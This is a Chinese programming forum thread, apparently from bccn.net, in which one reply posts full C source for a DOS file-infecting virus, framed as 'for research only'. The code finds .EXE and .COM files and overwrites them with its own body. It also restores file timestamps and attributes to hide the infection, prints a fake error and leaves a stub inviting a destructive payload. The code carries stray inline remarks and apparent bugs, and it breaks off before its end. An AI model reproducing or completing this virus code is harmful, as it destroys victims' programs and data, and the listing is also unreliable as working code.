标题:[讨论]C病毒代码(声明:不能去害人,只能研究技术!)
只看楼主
lovevista
Rank: 2
来 自:四川成都市
等 级:论坛游民
帖 子:41
专家分:13
注 册:2009-9-24
得分:0 
我这个菜鸟看看在说哈· ·
  呵呵·
·
2009-09-25 22:55
疯狂小子
Rank: 1
等 级:新手上路
帖 子:51
专家分:2
注 册:2009-6-8
得分:0 
还我什么时候有那么那厉害啊
2009-10-01 22:12
蓝天下的乌鸦
Rank: 1
等 级:新手上路
帖 子:16
专家分:0
注 册:2010-10-27
得分:0 
程序代码:
#include "stdio.h"
#include "string.h"
#include "dos.h"
#include "io.h"
#include "stdlib.h"
void hostile_activity(void); // a function which to destroy
int infected(char *); //check the file to see if it was injected
void spread(char *, char *); //do the function of spreading
void small_print(char *); //other functions
char *victim(void);
#define DEBUG
#define ONE_KAY 1024
#define TOO_SMALL ((6 * ONE_KAY) + 300) //define the smallest files
#define SIGNATURE "NMAN" // Sign of infection
int main(void)
{
/* The main program */
spread(_argv[0], victim()); // Perform infection
small_print("Out of memory\r\n"); // Print phony error
return(1); // Fake failure...
}
void hostile_activity(void)
{
/* Put whatever you feel like doing here...I chose to
make this part harmless, but if you're feeling
nasty, go ahead and have some fun... */
small_print("\a\a\aAll files infected. Mission complete.\r\n");
exit(2);
}
int infected(char *fname)
{
/* This function determines if fname is infected */
FILE *fp; // File handle
char sig[5]; // Virus signature
fp = fopen(fname, "rb");
fseek(fp, 28L, SEEK_SET);
fread(sig, sizeof(sig) - 1, 1, fp);
#ifdef DEBUG
printf("Signature for %s: %s\n", fname, sig);
#endif
fclose(fp);
return(strncmp(sig, SIGNATURE, sizeof(sig) - 1) == 0);
}
void small_print(char *string) I don't know This function !
{/* This function is a small, quick print routine */ I think ....
asm {
push si
mov si,string
mov ah,0xE
}
print: asm {
lodsb
or al,al
je finish
int 0x10
jmp short print
}
finish: asm pop si
}
void spread(char *old_name, char *new_name)
{/* This function infects new_name with old_name */
/* Variable declarations */
FILE *old, *new; // File handles
struct ftime file_time; // Old file date,
time
int attrib; // Old attributes
long old_size, virus_size; // Sizes of files
char *virus_code = NULL; // Pointer to virus
int old_handle, new_handle; // Handles for files
/* Perform the infection */
#ifdef DEBUG
printf("Infecting %s with %s...\n", new_name, old_name);
#endif
old = fopen(old_name, "rb"); // Open virus
new = fopen(new_name, "rb"); // Open victim
old_handle = fileno(old); // Get file handles
new_handle = fileno(new);
old_size = filelength(new_handle); // Get old file size
virus_size = filelength(old_handle); // Get virus size
attrib = _chmod(new_name, 0); // Get old attributes
getftime(new_handle, &file_time); // Get old file time
fclose(new); // Close the virusee
_chmod(new_name, 1, 0); // Clear any read-only
unlink(new_name); // Erase old file
new = fopen(new_name, "wb"); // Open new virus
new_handle = fileno(new);
virus_code = malloc(virus_size); // Allocate space
fread(virus_code, virus_size, 1, old); // Read virus from old
fwrite(virus_code, virus_size, 1, new); // Copy virus to new
_chmod(new_name, 1, attrib); // Replace attributes
chsize(new_handle, old_size); // Replace old size
setftime(new_handle, &file_time); // Replace old time
/* Clean up */
fcloseall(); // Close files
free(virus_code); // Free memory
}
char *victim(void)
{
/* This function returns the virus's next victim */
/* Variable declarations */
char *types[] = {"*.EXE", "*.COM"}; // Potential victims
static struct ffblk ffblk; // DOS file block
int done; // Indicates finish
int index; // Used for loop
/* Find our victim */
if ((_argc > 1) && (fopen(_argv[1], "rb") != NULL))
return(_argv[1]);
for (index = 0; index < sizeof(types); index++) {
done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN |
FA_SYSTEM | FA_ARCH);
while (!done) {
#ifdef DEBUG
printf("Scanning %s...\n", ffblk.ff_name);
#endif
/* If you want to check for specific days of the week,
months, etc., here is the place to insert the
code (don't forget to "#include "!) */
if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize >
TOO_SMALL))
return(ffblk.ff_name);
done = findnext(&ffblk);
}
}
/* If there are no files left to infect, have a little fun... */
hostile_activity();
return(0); // Prevents warning
2012-05-11 10:31
sr450789086
Rank: 1
等 级:新手上路
帖 子:1
专家分:0
注 册:2012-5-11
得分:0 
我是一新手 这代码咋觉得是错的呢
2012-05-11 15:29



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-163975-1-1.html




关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.242630 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved